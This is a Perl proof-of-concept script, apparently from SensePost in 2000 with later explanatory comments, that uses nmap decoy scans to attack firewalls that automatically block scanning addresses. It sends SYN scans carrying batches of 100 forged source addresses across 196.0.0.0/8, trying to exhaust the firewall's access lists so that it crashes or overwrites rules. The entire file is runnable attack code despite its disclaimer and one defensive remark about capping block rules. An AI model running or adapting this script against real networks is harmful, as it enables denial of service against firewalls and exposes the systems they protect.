#!/usr/bin/perl
# PERL script to possibly kill firewall systems that actively block IP
# numbers if the system detects that the IP is scanning more than 20 ports
# on a network behind the firewall. Works by basically creating a lot of
# decoys with nmap. Router/firewall will try to block all the (decoyed) IP
# numbers, eventually running out of access list/packetfilters, and possibly
# crashing, or overwriting access lists. Make sure your target is a machine
# behind the firewall. Requires nmap.
# This is a proof of concept code - not to be used on live systems.
# Standard disclaimer etc..
# Roelof Temmingh 2000/10/20
# [email protected] http://www.sensepost.com
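# Exactly one argument is expected: the host to scan.
die "usage: decoyblues target_behind_firewall\n" if @ARGV != 1;
# $ARGV[0] is the scalar element; the original @ARGV[0] was a one-element slice.
my $target = $ARGV[0];
# The target is placed on an nmap command line further down. Accept only the
# characters that occur in host names, IP addresses and CIDR suffixes, and
# require an alphanumeric first character, so that the argument can neither
# carry shell metacharacters nor be read by nmap as an option.
if ($target !~ m{\A[A-Za-z0-9][A-Za-z0-9._:/-]*\z}) {
    die "decoyblues: target must be a host name or IP address\n";
}
# File-scoped scratch variable: gonmapactive() stores the decoy list here.
my $passed;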
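# gonmapactive($decoys)
#
# Runs a single nmap SYN scan (-sS) of ports 20-40 against the file-level
# $target, with $decoys passed to -D. $decoys is a comma-terminated list of
# addresses; the keyword ME is appended so the real source address is the
# last entry in the decoy list. Returns the status from system().
#
# On the wire this is one scan whose probes carry every listed source address
# as well as the real one, so a device that reacts per source address sees as
# many apparent scanners as there are list entries.
sub gonmapactive
{
    # $_[0] is the scalar element; the original @_[0] was a one-element slice.
    $passed = $_[0];
    # add my IP right at the end of it all
    $passed = $passed . "ME";
    # List-form system() runs nmap directly, without /bin/sh, so nothing in
    # $target or $passed is ever interpreted as shell syntax.
    my $status = system('nmap', '-T', 'Aggressive', '-D', $passed,
                        '-sS', $target, '-p', '20-40');
    # -1 means nmap could not be started at all (for example, not installed).
    warn "decoyblues: could not run nmap: $!\n" if $status == -1;
    return $status;
}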
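# Build decoy lists from the addresses 196.<second>.<third>.1, with both
# octets running from 1 to 254, and hand each complete batch of 100 addresses
# to gonmapactive().
#
# Every batch therefore names 100 sources in 196.0.0.0/8 plus the scanning
# host itself. The decoy sources are forged by the sender, which is why
# block-on-scan rules keyed only on source address should be capped or expired
# rather than allowed to grow without limit.
#
# Lexical loop variables replace the original $a/$b, which are the package
# variables reserved for sort(); the sub is called without the legacy '&'.
my $count = 0;
my $add   = "";
for my $second (1 .. 254) {
    for my $third (1 .. 254) {
        $count++;
        $add .= "196.$second.$third.1,";
        # when we got a 100 decoys, ship it off to nmap
        if ($count == 100) {
            gonmapactive($add);
            $add   = "";
            $count = 0;
        }
    }
}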
# Spidermark: sensepostdata
------------------------------------------------------
Roelof W Temmingh SensePost IT security
[email protected] +27 83 448 6996
http://www.sensepost.com